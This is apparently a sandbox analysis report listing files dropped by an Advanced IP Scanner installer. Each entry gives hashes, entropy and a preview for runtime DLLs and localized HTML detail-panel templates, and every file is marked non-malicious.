Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24768
Entropy (8bit):	6.778007627268145
Encrypted:	false
SSDEEP:	768:J6S5yguNvZ5VQgx3SbwA71IkF+w8iB66kP:Jl5yguNvZ5VQgx3SbwA71Itnb6kP
MD5:	5E72659B38A2977984BBC23ED274F007
SHA1:	EA622D608CC942BDB0FAD118C8060B60B2E985C9
SHA-256:	44A4DB6080F6BDAE6151F60AE5DC420FAA3BE50902E88F8F14AD457DEC3FE4EA
SHA-512:	ED3CB656A5F5AEE2CC04DD1F25B1390D52F3E85F0C7742ED0D473A117D2AC49E225A0CB324C31747D221617ABCD6A9200C16DD840284BB29155726A3AA749BB1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@...........@..........................................0...............$...<..............8............................................................................text............................... ..`.rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-time-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	21184
Entropy (8bit):	6.908629649625132
Encrypted:	false
SSDEEP:	384:UzW2hWEgbCA0GftpBjJ6EKz3lvQyURz8X:y28i36bdvU2X
MD5:	1FA7C2B81CDFD7ACE42A2A9A0781C946
SHA1:	F5B7117D18A7335228829447E3ECCC7B806EF478
SHA-256:	CAFDB772A1D7ACF0807478FDBA1E00FD101FC29C136547B37131F80D21DACFFD
SHA-512:	339CDAF8DE445CF05BC201400D65BB9037EA7A3782BA76864842ADB6FBE5445D06863227DD774AB50E6F582B75886B302D5DD152AFF1825CF90E4F252398ACE0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-utility-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	7.011995208399749
Encrypted:	false
SSDEEP:	192:XY9fHQduPWVghW/EgbXH9YOCAs/nGfe4pBjSfbxaWNArXVWQ4mW0qnajMHxxBNTM:ef5W2hWcgbCA0GftpBjuYDlI663UD
MD5:	D6ABF5C056D80592F8E2439E195D61AC
SHA1:	33F793FD6A28673E766AD11EE1CF8EB8EF351BC0
SHA-256:	8858D883D180CEA63E3BF4A3F5BC9E0F9FA16C9A35A84C4EFE65308CEA13A364
SHA-512:	6678F17F2274AABBA5279BA40A0159FF8A54241D811845A48D845172F4AA6F7397CFD07BF2368299A613DF1F3FF12E06C0E62C26683DFB08D82122609C3A3F62
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......T....@.............................^............ ...................<..............8............................................................................text...n........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\details_panel_ar_sa.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1800
Entropy (8bit):	4.977566387382036
Encrypted:	false
SSDEEP:	48:ngn27UxOUZyUejUC3UCJ8UZzoUH0OUvMU70qlUQCU2DYlO:gj7Lfdk3tM/4qyMVO
MD5:	C342B5AAD7F710F39DD20641A1B3DF78
SHA1:	7C3636884EE5A170230CAD8D3B5BB875E59C8DF8
SHA-256:	A550CB4323FFBC96B8BED4E5A8F1A82E0EAAAF2987FF794DB55C7D48FB1CAFDC
SHA-512:	CEC17544EB60EB296A742AF55D010EA5D31D3DC34E9DF809B58EFA074F195FA19032C6190FEBBE801E16BDE7A18C5463E35ADC334F34ABEC7B1DFD1E0632BCF6
Malicious:	false
Preview:	<hr>..<h3 align="right" style="margin-right:2em">{name}</h3><p></p>..<table align="right">...<tr><td dir="rtl" align="right" style="padding-left:1em">{status}</td><td dir="rtl" align="right"><b>......:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{os}</td><td dir="rtl" align="right"><b>.... .......:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{ip}</td><td dir="rtl" align="right"><b>IP:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{mac}</td><td dir="rtl" align="right"><b>MAC:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{manufacturer}</td><td dir="rtl" align="right"><b>...... .......:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{netbios}</td><td dir="rtl" align="right"><b>NetBIOS:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{user}</td><td dir="rtl" align="right"><b>........:</b></t

C:\Program Files (x86)\Advanced IP Scanner\details_panel_bg_bg.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1244
Entropy (8bit):	5.128056579045673
Encrypted:	false
SSDEEP:	24:lFojhoCsuSH9AXqJH39/t0Kt5RGDXS9ReEhyv:HuZsRH9AXqJHN/t0U2DYs
MD5:	1C7DAA7B7C3119E37B599739F3372A97
SHA1:	D8E90B30F5D754C8B7623CF6FE3E5D298E620201
SHA-256:	DE38F8530D51823F9DDCB33D410D738513C5E83B7284278507F9FBEA2BF29650
SHA-512:	ED3A0FE123F4488AE9A4547B984CC7A21285D2F9638D9A25B772E853D45A3539B1C847046A85159F54029B572B8D9FCE80A4746C8D13928B9AD998F7D6DF4A1F
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>........... .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>............:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>..........:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>....:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">..

C:\Program Files (x86)\Advanced IP Scanner\details_panel_cs_cz.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1153
Entropy (8bit):	4.877089271030429
Encrypted:	false
SSDEEP:	12:AMJnuKoB2kV2B2uT2Bw2MKb2t52HcqQ2RCz282n0Kt1RhRGDbVzY1OzAkReEiWyv:lFosFsuS5XqiHJlL0Kt5RGDxReEhyv
MD5:	1D0D5C190B173CB0BED10C8B2E0F9697
SHA1:	83C10675F5A010668F4A278115BBC120F70EC99B
SHA-256:	F45A1EFA7DE1EE6ABA559166B744E6398A5BF5233EE3954E0A4BD3EB0904CE3F
SHA-512:	94E47E83159A43849DC269936D2B5E4866FB0C84DFDBB02664018CFCDBEDE06179F32324EE236910B4E2FEADC110F39EFD083A0F95B221E1D48A41A35E2C37FF
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stav:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Opera.n. syst.m:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>V.robce:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>U.ivatel:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Pozn.mky:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Slu.ba</center></b></td><td><b><center>Podrobnosti</ce

C:\Program Files (x86)\Advanced IP Scanner\details_panel_da_dk.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1151
Entropy (8bit):	4.790118218856679
Encrypted:	false
SSDEEP:	24:lFouisuSqZXqk/HuW4/0Kt5RGD3ReEhyv:HnisRqZXqmHuWK0U2DNs
MD5:	5AD712B9C416EE21623D620AB6019FB4
SHA1:	51DF096A58D6DF2A7CE33E22511C671883F2228C
SHA-256:	38D4DEAFB763B288A9A2322F4BE6E58909427ECFD025CAF0FDEB537C9880AA21
SHA-512:	608A2240E6F26C9F4A41A3A9B8D6EFCF4DC7735916CD58DFFC2AAC8948889515C2647F11DCF09FF9F0FC9245C7E09B548348B2B89925162EDE288FB0B74217E8
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativsystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Producent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Bruger:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Dato:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentarer:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Oplysninger</cent

C:\Program Files (x86)\Advanced IP Scanner\details_panel_de_de.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1153
Entropy (8bit):	4.788912446448768
Encrypted:	false
SSDEEP:	24:lFouzisuSpI/XqOQ/HJla0Kt5RGDFTHReEhyv:HnesRpaXqOyHJla0U2DFJs
MD5:	FBA663967DF5DD4AB38D38DA1362598E
SHA1:	9557B768C03EB179FDEBB5F74724985F51685203
SHA-256:	466C8D1C6798F392281C81AF34638C334489AB56C7DB86A3A23B1EDB2918C2DA
SHA-512:	427505B6A8278CF009E4051D458BDABCBBE83B9D8B279FB7267777403E50BF26570D1FBD6EB4CD73E6F28E5565CEEA2B02B1EC3197FD85E78B5B0AB932FAC2D1
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Betriebssystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Hersteller:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Anwender:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Art:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentare:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Dienst</center></b></td><td><b><center>Ausf.hrlich</ce

C:\Program Files (x86)\Advanced IP Scanner\details_panel_el_gr.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1256
Entropy (8bit):	5.1672203710221565
Encrypted:	false
SSDEEP:	24:lFoDdHxqsuSTBXq0QH1R7y0Kt5RGDxD0nIgReEhyv:HeHQsR9XqVH1Re0U2DCds
MD5:	38E55188530EE1FC3B88A22697957911
SHA1:	BDF54BFF5183DEE6D233B521CFF1DBAB6D46BAA7
SHA-256:	EBD614652D83E094756B7E5490105E340FFE27C2664CF0DC4D3626C92E2AB6B4
SHA-512:	F8A603C8C5803B293B37E58AFE3845D187DD894799C9745AEF7F93785A9064BF81D45CEACC27E68F1B263C1769660E95E61D0E5C0B6EFEAED3FFE274A9016CD3
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>........... .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>.............:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>.......:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>.....:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..........:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>......:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebe

C:\Program Files (x86)\Advanced IP Scanner\details_panel_en_us.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1147
Entropy (8bit):	4.784372507341765
Encrypted:	false
SSDEEP:	24:lFourZsuSd/Xqk/Hu0B10Kt5RGDz9ScReEhyv:HnrZsRhXqmHu410U2Dz9S+s
MD5:	04C416BEC9FE7DEC52E2F368353FF1F9
SHA1:	DB86325EDF8EED3639A26ED279A00EBC9208ED1E
SHA-256:	10946712CE123E177350A9D96F61B2011FFCCC90597880F256E3A24676CD4B30
SHA-512:	4069E9327ED9BE5FA81EF9A7148959B376677710D8D77CE1B247AF5065C1E7B2CC50561E47F7AEBA2DA48A8FBC79752147CCF262A8C1E6A66408ACFF07489E29
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operating system:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Manufacturer:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>User:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Date:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Comments:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Details</center><

C:\Program Files (x86)\Advanced IP Scanner\details_panel_es_es.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1173
Entropy (8bit):	4.837006163390497
Encrypted:	false
SSDEEP:	24:lFoSb9bqsuShXqRHRM9BHBl0Kt5RGDhC+6ReEhyv:Hpb9bqsRhXqRHwBhl0U2Dw+As
MD5:	3DF24E832E07A361EE154A0635DF60F7
SHA1:	B02EDAA0C6B997830669B6FF1A3C6FB43331CFD3
SHA-256:	7A0B4383F55B6D2D52869CD50951FDE5ABE94208DE076161D12F7702537F37EA
SHA-512:	C8E81AFCF8E26086E83E410F158C46336CDB039014FDB1686F5E039032E044B87EBFEF1E9E71CBA34FA6D0F24EFE914A4AE180A61CB80E619C18BBE1D6ACAD2C
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Estado:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistema operativo:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Fabricante:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Usuario:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipo:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Fecha:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Comentarios:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Servicio t.cnico</center></b></td><td><b><center>M

C:\Program Files (x86)\Advanced IP Scanner\details_panel_et_ee.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1150
Entropy (8bit):	4.850275626289269
Encrypted:	false
SSDEEP:	24:lForPQsuSRBXqDH03Rrh0Kt5RGDVx3rgReEhyv:HyPQsRRBXqDHyRt0U2DVtras
MD5:	6B21CA02EF7F5C3E6641DBB222A207DC
SHA1:	215CE642734FDA5004F603E593FAA2EB70663500
SHA-256:	3B0A1534FFEF9FB0B1BA169DDA53E26A940E0C644A47D8567E4E804D3DFADF24
SHA-512:	A61FEAEBB6819C6B2CCC8120FB5E64CE71E8399C19221255FB7C3BCB9F557291A75CF965704003A7EA748753097B9E43D0548C1ACC9FE76DA490F70D55B85461
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Olek:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Ops.steem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Tootja:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Kasutaja:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>T..p:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Kuup.ev:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentaarid:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Teenus</center></b></td><td><b><center>.ksikasjad</cente

C:\Program Files (x86)\Advanced IP Scanner\details_panel_fa_ir.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1751
Entropy (8bit):	4.952964955431726
Encrypted:	false
SSDEEP:	48:ngn27UxzUZMUejUC3UCIUZzoUH0iUvoU7wpYlUQwU2DY4IO:gjmhfd0t07cqyOoIO
MD5:	23760926BFC668193D027DB24E198051
SHA1:	FF7AC19A7113F2DAA66B20C310A09752620E6455
SHA-256:	2E4A9A21A7D3444008849936F5473F78CB4DB93E9EE0992F023767B682300635
SHA-512:	F4B91BA666141C00C2282F2DCB3D5EB75F709A8E58D4DBF8992DAF17A1F163E019D1843A3A2441F392A46E4B9397666B5AD3CC76385BA3DF6897105250506E33
Malicious:	false
Preview:	<hr>..<h3 align="right" style="margin-right:2em">{name}</h3><p></p>..<table align="right">...<tr><td dir="rtl" align="right" style="padding-left:1em">{status}</td><td dir="rtl" align="right"><b>.....:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{os}</td><td dir="rtl" align="right"><b>..... ....:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{ip}</td><td dir="rtl" align="right"><b>IP:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{mac}</td><td dir="rtl" align="right"><b>MAC:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{manufacturer}</td><td dir="rtl" align="right"><b>......: ....:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{netbios}</td><td dir="rtl" align="right"><b>NetBIOS:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{user}</td><td dir="rtl" align="right"><b>.....:</b></td></tr>...<tr><td

C:\Program Files (x86)\Advanced IP Scanner\details_panel_fi_fi.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1168
Entropy (8bit):	4.8708624632073105
Encrypted:	false
SSDEEP:	24:lFokVpsuS4XqW1H5l+Ah1j0Kt5RGDLDiReEhyv:H9VpsR4XqW1H5lBh1j0U2DLDos
MD5:	6A9A7FB51DD16A4EDBEAF52A7567EA70
SHA1:	27B2444894F6B432AD36CB14D79BAD1BA6529887
SHA-256:	C4AD3344E412976BD9F7B8DDC8C60FDB94461201C814529CC5300FFDEB35BC08
SHA-512:	E627B085002A98E4C899FB4B9C7F4A90531C2D25233E3AD1ED0C4BFA87D0DE7D8E38F07D3CD0130955670D9C5F50F1D2BA40BBDF355F0FD202B1CE278A734F54
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Tila:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>K.ytt.j.rjestelm.:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Valmistaja:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>K.ytt.j.:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tyyppi:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>P.iv.m..r.:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentit:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Palvelu</center></b></td><td><b><ce

C:\Program Files (x86)\Advanced IP Scanner\details_panel_fr_fr.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1163
Entropy (8bit):	4.810701494539991
Encrypted:	false
SSDEEP:	24:lFo3WsuSsXq9e/Hu0Bk0Kt5RGDzLcReEhyv:HeWsRsXqqHu4k0U2DzL+s
MD5:	C6CEF752D7D9FD44C45C67AE637EC697
SHA1:	AD7D24492C5B44BBD96C0705308548BE46B5A743
SHA-256:	4A9255685D393748B0E36243601E546222C005F1D24C99C97CDB3B926A27BC5D
SHA-512:	0F4D2C69D548E5550A93CE5A8D8C58A6449D4432F561554ABA54880C154999D11360412CF15DED3261EA485C49976F173A49C211C22C2D80E8BFBACF981C168D
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Statut:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Syst.me d'exploitation:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Fabricant:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Utilisateur:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Date:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Commentaires:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>D.

C:\Program Files (x86)\Advanced IP Scanner\details_panel_he_il.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2080
Entropy (8bit):	4.902799949328129
Encrypted:	false
SSDEEP:	48:b1+7UxUhUZU+UeUQUCUyUCUJUZUUoUH0UAUvUlU7UJUQU+UYD8UCtZUn+:xL+O2Z5bNdNG2y/rMyYGb6Ct2n+
MD5:	64D0C8B9E985CFD51786E85509000617
SHA1:	65FC3558C0BED0CDECFCDAF9BA55F7EFACCBC694
SHA-256:	F3A60BD72994B19FB680F5071DAA675A6A07FE3805522F26456958A260999FCD
SHA-512:	DEB626895CC5C445F99214F26FB605BD5D9787E0545224A5E2B51E33371B9A6E88533E5F443FE72B619959391BA5183C40EC50F76D46BD1313BB062EA0679F96
Malicious:	false
Preview:	<hr>..<h3 dir="rtl" align="right" style="margin-left:2em">{name}</h3><p></p>..<table dir="rtl" align="right">...<tr><td dir="rtl" align="right" style="padding-left:1em">{status}</td><td dir="rtl" align="right" style="padding-left:1em"><b>.....: </b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{os}</td><td dir="rtl" align="right" style="padding-left:1em"><b>..... .....: </b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{ip}</td><td dir="rtl" align="right" style="padding-left:1em"><b>IP:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{mac}</td><td dir="rtl" align="right" style="padding-left:1em"><b>MAC:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{manufacturer}</td><td dir="rtl" align="right" style="padding-left:1em"><b>....: </b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{netbios}</td><td dir="rtl" align="right" style="padding-left:1em"><b

C:\Program Files (x86)\Advanced IP Scanner\details_panel_hr_hr.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-11FV5.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1158
Entropy (8bit):	4.839285803199877
Encrypted:	false
